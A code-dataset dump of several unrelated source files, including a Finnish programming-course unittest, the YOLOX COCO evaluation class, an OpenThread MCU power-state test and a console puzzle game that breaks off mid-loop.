ParticlePropertySvc().Particles = [ "H_10 87 25 0.0 0.250 1.0000e-10 Higgs0 25 0.000000e+000" ]
ApplicationMgr().ExtSvc += [ ParticlePropertySvc() ]
gigaHiggsPart = GiGaHiggsParticles()
gigaHiggsPart.Higgses = ["H_10"] # H_10, H_20, H_30
GiGaPhysListModular("ModularPL").PhysicsConstructors += [ gigaHiggsPart ]#
| [
"[email protected]"
] | |
56fcd9d7569cd87ba0cc217a1be8e88301bac6f5 | 361ac3fcf36d80c792b60b7e2284cb1dc8d77944 | /osa03-16_sanojen_ensimmaiset_kirjaimet/test/test_sanojen_ensimmaiset_kirjaimet.py | bd5cdde1c62e7f1ca35d82db216518e44c552e43 | [] | no_license | darkismus/mooc-ohjelmointi-21 | 48cc20391db4240104549d4f3834a67c77976f6d | 5f72dd9cff78704a2a0f5bc1cc18c7740ce50c51 | refs/heads/main | 2023-08-01T03:35:13.244978 | 2021-09-14T10:49:37 | 2021-09-14T10:49:37 | 368,469,947 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,507 | py | import unittest
from unittest.mock import patch
from tmc import points
from tmc.utils import load_module, reload_module, get_stdout
from functools import reduce
exercise = 'src.sanojen_ensimmaiset_kirjaimet'
def outputs_equal(str1 : str, str2 : str) -> bool:
return str1.lower() == str2.lower()
def get_correct(s : str) -> str:
return "\n".join([x[0] for x in s.split()])
@points('3.sanojen_ensimmaiset_kirjaimet')
class SanojenEnsimmaisetKirjaimetTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
with patch('builtins.input', return_value = "x"):
cls.module = load_module(exercise, 'fi')
def test_lyhyet_lauseet(self):
words = ["Heipparallaa", "Terve kaikille", "Moi vaan kaikille", "Simsalabim, sanoi taikuri",
"Mitäpä tässä hötkyilemään", "Vielä yksi testilause tässä"]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
                self.assertFalse(len(output_all)==0, "Your program prints nothing with the input " + testcase)
                self.assertTrue(len(output) == len_correct, "With the input ({}), instead of {} lines your program prints {} lines: \n{}".
                    format(testcase, len_correct, len(output), output_all))
                self.assertTrue(outputs_equal(output_all, correct),
                    "Your program's output\n{}\ndoes not match the expected output \n{} \nwith the input ({})".
                    format(output_all, correct, testcase))
def test_pidemmat_lauseet(self):
words = ["Mitäpä tässä turhia jaarittelemaan, vaan jaarittelenpa tovin sittenkin.",
"Tässäpä vähän pidempi testilause: nähdään samantien miten hyvin ohjelma toimii",
"Otetaanpa vielä yksi testi tähän loppuun: tässä lauseessa onkin aika paljon sanoja."]
for testcase in words:
with patch('builtins.input', return_value = testcase):
try:
reload_module(self.module)
except:
self.assertFalse(True, f"varmista että ohjelmasti toimii syötteellä\n{testcase}")
output_all = get_stdout()
output = [x.strip() for x in output_all.split("\n") if len(x.strip()) > 0]
correct = get_correct(testcase)
len_correct = len(correct.split("\n"))
                self.assertFalse(len(output_all)==0, "Your program prints nothing with the input " + testcase)
                self.assertTrue(len(output) == len_correct, "With the input ({}), instead of {} lines your program prints {} lines: \n{}".
                    format(testcase, len_correct, len(output), output_all))
                self.assertTrue(outputs_equal(output_all, correct),
                    "Your program's output\n{}\ndoes not match the expected output \n{} \nwith the input ({})".
                    format(output_all, correct, testcase))
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
0519b9a6c3d736fd51361e9def7cf66c291409c5 | 915ac708aeac53125f29bef90c2c047eaed4940e | /Anaconda/Scripts/rst2xetex.py | 2d9179a588e56dbef11208ccd0ed3621286f9cc3 | [] | no_license | bopopescu/newGitTest | c8c480ddd585ef416a5ccb63cbc43e3019f92534 | 5a19f7d01d417a34170a8f760a76e6a8bb7c9274 | refs/heads/master | 2021-05-31T17:00:26.656450 | 2016-06-08T06:43:52 | 2016-06-08T06:43:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 795 | py | #!C:\aroot\stage\python.exe
# $Id: rst2xetex.py 7038 2011-05-19 09:12:02Z milde $
# Author: Guenter Milde
# Copyright: This module has been placed in the public domain.
"""
A minimal front end to the Docutils Publisher, producing XeLaTeX source code.
"""
try:
import locale
locale.setlocale(locale.LC_ALL, '')
except:
pass
from docutils.core import publish_cmdline
description = ('Generates XeLaTeX documents from standalone reStructuredText '
'sources. '
'Reads from <source> (default is stdin) and writes to '
'<destination> (default is stdout). See '
'<http://docutils.sourceforge.net/docs/user/latex.html> for '
'the full reference.')
publish_cmdline(writer_name='xetex', description=description)
| [
"[email protected]"
] | |
48f6fab3b18bb1659f37d45e12c7ea01398ed32a | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/otherforms/_bunts.py | 41d450a12d291732d8830616446e29d1957fe2d2 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 214 | py |
# class header
class _BUNTS():
def __init__(self,):
self.name = "BUNTS"
        self.definitions = ['bunt']  # was a bare name (NameError); assuming a list of definition strings like self.basic
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.basic = ['bunt']
| [
"[email protected]"
] | |
e662722fad68cff102487d6ba08454d41807ad11 | 2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02 | /PyTorch/dev/cv/detection/YOLOX_Dynamic_ID4069_for_PyTorch/yolox/layers/fast_coco_eval_api.py | 55bfa28a1c06813d48ff90862908a7655239001e | [
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"MIT",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | Ascend/ModelZoo-PyTorch | 4c89414b9e2582cef9926d4670108a090c839d2d | 92acc188d3a0f634de58463b6676e70df83ef808 | refs/heads/master | 2023-07-19T12:40:00.512853 | 2023-07-17T02:48:18 | 2023-07-17T02:48:18 | 483,502,469 | 23 | 6 | Apache-2.0 | 2022-10-15T09:29:12 | 2022-04-20T04:11:18 | Python | UTF-8 | Python | false | false | 6,464 | py |
# Copyright 2020 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
#!/usr/bin/env python3
# -*- coding:utf-8 -*-
# This file comes from
# https://github.com/facebookresearch/detectron2/blob/master/detectron2/evaluation/fast_eval_api.py
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
# Copyright (c) Megvii Inc. All rights reserved.
import copy
import time
import numpy as np
from pycocotools.cocoeval import COCOeval
from .jit_ops import FastCOCOEvalOp
class COCOeval_opt(COCOeval):
"""
This is a slightly modified version of the original COCO API, where the functions evaluateImg()
    and accumulate() are implemented in C++ to speed up evaluation
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.module = FastCOCOEvalOp().load()
def evaluate(self):
"""
        Run per-image evaluation on the given images and store the results in self._evalImgs_cpp, a
        data structure that isn't readable from Python but is used by a C++ implementation of
        accumulate(). Unlike the original COCO PythonAPI, we don't populate the data structure
        self.evalImgs because it is a computational bottleneck.
:return: None
"""
tic = time.time()
print("Running per image evaluation...")
p = self.params
# add backward compatibility if useSegm is specified in params
if p.useSegm is not None:
p.iouType = "segm" if p.useSegm == 1 else "bbox"
print(
"useSegm (deprecated) is not None. Running {} evaluation".format(
p.iouType
)
)
print("Evaluate annotation type *{}*".format(p.iouType))
p.imgIds = list(np.unique(p.imgIds))
if p.useCats:
p.catIds = list(np.unique(p.catIds))
p.maxDets = sorted(p.maxDets)
self.params = p
self._prepare()
# loop through images, area range, max detection number
catIds = p.catIds if p.useCats else [-1]
if p.iouType == "segm" or p.iouType == "bbox":
computeIoU = self.computeIoU
elif p.iouType == "keypoints":
computeIoU = self.computeOks
self.ious = {
(imgId, catId): computeIoU(imgId, catId)
for imgId in p.imgIds
for catId in catIds
}
maxDet = p.maxDets[-1]
# <<<< Beginning of code differences with original COCO API
def convert_instances_to_cpp(instances, is_det=False):
# Convert annotations for a list of instances in an image to a format that's fast
# to access in C++
instances_cpp = []
for instance in instances:
instance_cpp = self.module.InstanceAnnotation(
int(instance["id"]),
instance["score"] if is_det else instance.get("score", 0.0),
instance["area"],
bool(instance.get("iscrowd", 0)),
bool(instance.get("ignore", 0)),
)
instances_cpp.append(instance_cpp)
return instances_cpp
# Convert GT annotations, detections, and IOUs to a format that's fast to access in C++
ground_truth_instances = [
[convert_instances_to_cpp(self._gts[imgId, catId]) for catId in p.catIds]
for imgId in p.imgIds
]
detected_instances = [
[
convert_instances_to_cpp(self._dts[imgId, catId], is_det=True)
for catId in p.catIds
]
for imgId in p.imgIds
]
ious = [[self.ious[imgId, catId] for catId in catIds] for imgId in p.imgIds]
if not p.useCats:
# For each image, flatten per-category lists into a single list
ground_truth_instances = [
[[o for c in i for o in c]] for i in ground_truth_instances
]
detected_instances = [
[[o for c in i for o in c]] for i in detected_instances
]
# Call C++ implementation of self.evaluateImgs()
self._evalImgs_cpp = self.module.COCOevalEvaluateImages(
p.areaRng,
maxDet,
p.iouThrs,
ious,
ground_truth_instances,
detected_instances,
)
self._evalImgs = None
self._paramsEval = copy.deepcopy(self.params)
toc = time.time()
print("COCOeval_opt.evaluate() finished in {:0.2f} seconds.".format(toc - tic))
# >>>> End of code differences with original COCO API
def accumulate(self):
"""
Accumulate per image evaluation results and store the result in self.eval. Does not
support changing parameter settings from those used by self.evaluate()
"""
print("Accumulating evaluation results...")
tic = time.time()
if not hasattr(self, "_evalImgs_cpp"):
print("Please run evaluate() first")
self.eval = self.module.COCOevalAccumulate(self._paramsEval, self._evalImgs_cpp)
# recall is num_iou_thresholds X num_categories X num_area_ranges X num_max_detections
self.eval["recall"] = np.array(self.eval["recall"]).reshape(
self.eval["counts"][:1] + self.eval["counts"][2:]
)
# precision and scores are num_iou_thresholds X num_recall_thresholds X num_categories X
# num_area_ranges X num_max_detections
self.eval["precision"] = np.array(self.eval["precision"]).reshape(
self.eval["counts"]
)
self.eval["scores"] = np.array(self.eval["scores"]).reshape(self.eval["counts"])
toc = time.time()
print(
"COCOeval_opt.accumulate() finished in {:0.2f} seconds.".format(toc - tic)
)
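# Illustrative usage sketch (added; mirrors the stock pycocotools API, and the
# file names below are placeholders):
#   from pycocotools.coco import COCO
#   coco_gt = COCO("instances_val2017.json")
#   coco_dt = coco_gt.loadRes("detections.json")
#   evaluator = COCOeval_opt(coco_gt, coco_dt, "bbox")
#   evaluator.evaluate(); evaluator.accumulate(); evaluator.summarize()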
| [
"[email protected]"
] | |
fe484f2dbfa7363e12c93e00a34759692e113a73 | f4b8c90c1349c8740c1805f7b6b0e15eb5db7f41 | /test/test_term_session_item.py | 7867f29a7aa4a6fd2bb993565b40f161db7abf86 | [] | no_license | CalPolyResDev/StarRezAPI | 012fb8351159f96a81352d6c7bfa36cd2d7df13c | b184e1863c37ff4fcf7a05509ad8ea8ba825b367 | refs/heads/master | 2021-01-25T10:29:37.966602 | 2018-03-15T01:01:35 | 2018-03-15T01:01:35 | 123,355,501 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,044 | py | # coding: utf-8
"""
StarRez API
This is a way to connect with the StarRez API. We are not the developers of the StarRez API, we are just an organization that uses it and wanted a better way to connect to it. # noqa: E501
OpenAPI spec version: 1.0.0
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import starrez_client
from starrez_client.models.term_session_item import TermSessionItem # noqa: E501
from starrez_client.rest import ApiException
class TestTermSessionItem(unittest.TestCase):
"""TermSessionItem unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testTermSessionItem(self):
"""Test TermSessionItem"""
# FIXME: construct object with mandatory attributes with example values
# model = starrez_client.models.term_session_item.TermSessionItem() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
| [
"[email protected]"
] | |
2f9bdc29452a2db1226f3a1ca5aab9fbdac5e5d6 | 6d0364f7aca2ea76444299d84d467a55b8dfabde | /tests/toranj/test-100-mcu-power-state.py | 4cba5896a9f0a28e51ca54be48ff0350a5037d02 | [
"LicenseRef-scancode-warranty-disclaimer",
"BSD-3-Clause"
] | permissive | particle-iot/openthread | b862853867a75a591bcb3dae8f70c2ac9c35eaba | 668256290d1c48319b0b96d41559efb48dcc0821 | refs/heads/master | 2020-03-13T13:02:45.358306 | 2019-07-09T11:38:23 | 2019-07-09T11:38:23 | 131,131,221 | 1 | 0 | BSD-3-Clause | 2019-05-19T03:42:57 | 2018-04-26T09:19:12 | C++ | UTF-8 | Python | false | false | 9,901 | py | #!/usr/bin/env python
#
# Copyright (c) 2018, The OpenThread Authors.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import time
import wpan
from wpan import verify
#-----------------------------------------------------------------------------------------------------------------------
# Test description: Testing controlling of NCP's MCU power state
test_name = __file__[:-3] if __file__.endswith('.py') else __file__
print '-' * 120
print 'Starting \'{}\''.format(test_name)
#-----------------------------------------------------------------------------------------------------------------------
# Creating `wpan.Nodes` instances
node = wpan.Node()
#-----------------------------------------------------------------------------------------------------------------------
# Init all nodes
wpan.Node.init_all_nodes()
#-----------------------------------------------------------------------------------------------------------------------
# Test implementation
# Verify that state is ON after a reset
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Check power state wpantund property get and set
WAIT_TIME = 5
def check_wpan_is_in_offline_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_OFFLINE)
def check_wpan_is_in_deep_sleep_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_DEEP_SLEEP)
def check_wpan_is_in_commissioned_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_COMMISSIONED)
def check_wpan_is_in_associated_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
def check_wpan_is_in_associating_state():
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATING)
node.form("mcu-power-state")
verify(node.is_associated())
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, 'low-power')
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, 'on')
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, 'lp') # special short-form string for low-power
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
# Verify that `wpantund` will restore the user-set value after NCP reset
node.reset()
time.sleep(1)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Check the `wpantund` state changes between "deep-sleep" and "offline"
node.leave()
verify(not node.is_associated())
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_OFFLINE)
# Setting the power state to `low-power` should change wpantund state to `DEEP_SLEEP`
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
# Verify that reading/getting a property does not impact the wpantund state.
node.get(wpan.WPAN_THREAD_RLOC16)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_DEEP_SLEEP)
# Setting the power state to `on` should change wpantund state to `OFFLINE`
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
wpan.verify_within(check_wpan_is_in_offline_state, WAIT_TIME)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify the behavior of `begin-low-power` wpanctl command
node.wpanctl('begin-low-power')
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
wpan.verify_within(check_wpan_is_in_offline_state, WAIT_TIME)
# Check the `wpantund` state changes between "offline:commissioned" and "deep-sleep"
node.form("test-network")
node.set('Daemon:AutoAssociateAfterReset','0')
# Verify that issuing a `begin-low-power` when in "associated" state
# does not change the state.
node.wpanctl('begin-low-power')
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_ASSOCIATED)
# After reset, power state should remain `LOW_POWER` (wpantund would restore the value
# on NCP) and since "AutoAssociateAfterReset" is disabled, wpantund state should
# be `DEEP_SLEEP`.
node.reset()
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
wpan.verify_within(check_wpan_is_in_commissioned_state, WAIT_TIME)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_ON)
node.leave()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify sleep behavior after disabling `wpantund` ("Daemon:Enabled" property) when state is "offline"
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
verify(node.get(wpan.WPAN_STATE) == wpan.STATE_OFFLINE)
verify(node.get('Daemon:Enabled') == 'true')
# Disabling `wpantund` should put the NCP to deep sleep
node.set('Daemon:Enabled', 'false');
verify(node.get('Daemon:Enabled') == 'false')
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
# Enabling `wpantund` should update the `MCU_POWER_STATE` back to `ON`.
node.set('Daemon:Enabled', 'true');
wpan.verify_within(check_wpan_is_in_offline_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify sleep behavior after disabling `wpantund` ("Daemon:Enabled" property) when state is "associated"
node.form("disable-test")
verify(node.is_associated())
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.set('Daemon:Enabled', 'false');
verify(node.get('Daemon:Enabled') == 'false')
wpan.verify_within(check_wpan_is_in_deep_sleep_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.set('Daemon:Enabled', 'true');
wpan.verify_within(check_wpan_is_in_commissioned_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_ON)
node.leave()
#- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# Verify `AutoAssociateAfterReset` behavior after reset from "deep-sleep" (but commissioned).
node.set('Daemon:AutoAssociateAfterReset', '1')
node.set(wpan.WPAN_NCP_MCU_POWER_STATE, wpan.MCU_POWER_STATE_LOW_POWER)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.form("resume-test")
verify(node.is_associated())
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
node.reset()
# After reset, power state should remain `LOW_POWER` (wpantund would restore the value
# on NCP) and wpantund state should start as "deep-sleep" but since AutoAssociateAfterReset
# is enabled, network should be recovered.
wpan.verify_within(check_wpan_is_in_associating_state, WAIT_TIME)
verify(node.get(wpan.WPAN_NCP_MCU_POWER_STATE) == wpan.MCU_POWER_STATE_LOW_POWER)
#-----------------------------------------------------------------------------------------------------------------------
# Test finished
wpan.Node.finalize_all_nodes()
print '\'{}\' passed.'.format(test_name)
| [
"[email protected]"
] | |
415935edef31996e2b359804e324f5f7b3d48614 | ab9b75fcdd2b7352968886e5ed41ee7788216226 | /src/gamesbyexample/stickyhands.py | a1af5601756ea83263f3a20e8dd2bb26220102ac | [
"MIT"
] | permissive | mgocken/PythonStdioGames | d7b48cafbc33a027548cab08ad08aea6c0c81abd | 036d2f142581fb74a38400721aecce15a695e1bc | refs/heads/master | 2020-09-29T18:35:34.589307 | 2019-12-06T00:15:46 | 2019-12-06T00:15:46 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,528 | py | # Sticky Hands, by Al Sweigart [email protected]
# A jewel-stealing, movement puzzle game.
__version__ = 1
# Inspired by Herding Cats https://w.itch.io/herding-cats
# TODO - Enter R to reset the entire level.
import copy, os, sys
# Setup the constants:
WALL = chr(9608)
FACE = chr(9786)
DIAMOND = chr(9830)
CHAR_MAP = {'#': WALL, '@': FACE, '$': DIAMOND, ' ': ' '}  # Maps level-file characters to the symbols drawn on screen.
# Display the title banner and instructions:
print('''Sticky Hands: A diamond collecting game.
By Al Sweigart [email protected]
Pick up diamonds by standing next to them. Stuck diamonds also
become sticky. Try to stick every diamond in the level.
Enter WASD letters to move, numbers to switch levels, U to undo a
move, or "quit" to quit the game. You can enter multiple WASD or U
letters to make several moves at once.
''')
# Load each level from stickyhandslevels.txt
if not os.path.exists('stickyhandslevels.txt'):
print('Download the level file from https://github.com/asweigart/PythonStdioGames/blob/master/src/stickyhandslevels.txt')
sys.exit()
ALL_LEVELS = []
with open('stickyhandslevels.txt') as levelFile:
currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0} # Each level is represented by a dictionary.
y = 0
for line in levelFile.readlines():
if line.startswith(';'):
continue # Ignore comments in the level file.
if line == '\n':
if currentLevelFromFile == {'width': 0, 'height': 0, 'diamonds': 0}:
continue # Ignore this line, and continue to the next line.
# Finished with the current level:
ALL_LEVELS.append(currentLevelFromFile)
currentLevelFromFile = {'width': 0, 'height': 0, 'diamonds': 0}
y = 0 # Reset y back to 0.
continue
# Add the line to the current level.
# We use line[:-1] so we don't include the newline:
for x, levelChar in enumerate(line[:-1]):
currentLevelFromFile[(x, y)] = levelChar
# Keep track of how many diamonds are in the level:
if levelChar == '$':
currentLevelFromFile['diamonds'] += 1
y += 1
if len(line) - 1 > currentLevelFromFile['width']:
currentLevelFromFile['width'] = len(line) - 1
if y > currentLevelFromFile['height']:
currentLevelFromFile['height'] = y
def drawLevel(levelNum, levelData):
# Draw the current level.
print('Level #' + str(levelNum + 1), 'of', len(ALL_LEVELS))
for y in range(levelData['height']):
for x in range(levelData['width']):
prettyChar = CHAR_MAP[levelData.get((x, y), ' ')]
print(prettyChar, end='')
print()
def getPlayerBlobPoints(levelData, playerx, playery):
playerBlob = [(playerx, playery)]
pointsToCheck = [(playerx, playery)]
alreadyCheckedPoints = []
while len(pointsToCheck) > 0:
x, y = pointsToCheck.pop()
alreadyCheckedPoints.append((x, y))
if (x - 1, y) not in alreadyCheckedPoints and levelData[(x - 1, y)] == '$':
playerBlob.append((x - 1, y))
pointsToCheck.append((x - 1, y))
if (x + 1, y) not in alreadyCheckedPoints and levelData[(x + 1, y)] == '$':
playerBlob.append((x + 1, y))
pointsToCheck.append((x + 1, y))
if (x, y - 1) not in alreadyCheckedPoints and levelData[(x, y - 1)] == '$':
playerBlob.append((x, y - 1))
pointsToCheck.append((x, y - 1))
if (x, y + 1) not in alreadyCheckedPoints and levelData[(x, y + 1)] == '$':
playerBlob.append((x, y + 1))
pointsToCheck.append((x, y + 1))
return playerBlob
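# getPlayerBlobPoints() is a four-direction flood fill: starting from the
# player tile it keeps absorbing every '$' tile adjacent to the growing blob,
# so a chain of touching diamonds moves as one unit with the player.
# (Note: it indexes levelData directly rather than using .get(), so levels
# must be fully bordered by walls for the neighbor lookups to stay in bounds.)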
currentLevelNumber = 0
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
while True: # Main game loop.
drawLevel(currentLevelNumber, currentLevel)
# Get the input from the player:
moves = input('Enter moves> ').upper()
if moves == 'QUIT':
print('Thanks for playing!')
sys.exit()
if moves.isdecimal():
        if not (1 <= int(moves) <= len(ALL_LEVELS)):
print('Enter a level number between 1 and', len(ALL_LEVELS))
continue
# Change the current level:
currentLevelNumber = int(moves) - 1
currentLevel = copy.copy(ALL_LEVELS[currentLevelNumber])
undoStack = [copy.copy(currentLevel)]
continue
# Validate the input; make sure it only has W, A, S, D, or U:
movesAreValid = True
for move in moves:
if move not in ('W', 'A', 'S', 'D', 'U'):
movesAreValid = False
print(move, 'is not a valid move.')
break
if not movesAreValid:
continue
# Carry out the moves:
for move in moves:
# Find the player position:
for position, character in currentLevel.items():
if character == '@':
playerx, playery = position
if move == 'U':
if len(undoStack) == 1:
continue # Can't undo past the first move.
undoStack.pop() # Remove the last item from the undoStack list.
currentLevel = copy.copy(undoStack[-1])
continue
if move == 'W':
movex, movey = 0, -1
elif move == 'A':
movex, movey = -1, 0
elif move == 'S':
movex, movey = 0, 1
elif move == 'D':
movex, movey = 1, 0
playerBlob = getPlayerBlobPoints(currentLevel, playerx, playery)
blobCanMove = True
for blobPoint in playerBlob:
blobx, bloby = blobPoint[0], blobPoint[1]
moveToSpace = currentLevel.get((blobx + movex, bloby + movey), ' ')
# If the move-to space is a wall, don't move at all:
if moveToSpace == '#':
blobCanMove = False
break
if blobCanMove:
newBlobPoints = []
for blobPoint in playerBlob:
blobx, bloby = blobPoint[0], blobPoint[1]
# If the move-to space is empty or a goal, just move there:
if currentLevel[(blobx, bloby)] == '@':
currentLevel[(blobx, bloby)] = ' '
newBlobPoints.append((blobx + movex, bloby + movey, '@'))
elif currentLevel[(blobx, bloby)] == '$':
currentLevel[(blobx, bloby)] = ' '
newBlobPoints.append((blobx + movex, bloby + movey, '$'))
            for newx, newy, newChar in newBlobPoints:
                # Set the new position of each moved blob tile:
                currentLevel[(newx, newy)] = newChar
# Save the state of the level for the undo feature:
undoStack.append(copy.copy(currentLevel))
# Check if the player has finished the level:
levelIsSolved = False
playerBlob = getPlayerBlobPoints(currentLevel, playerx + movex, playery + movey)
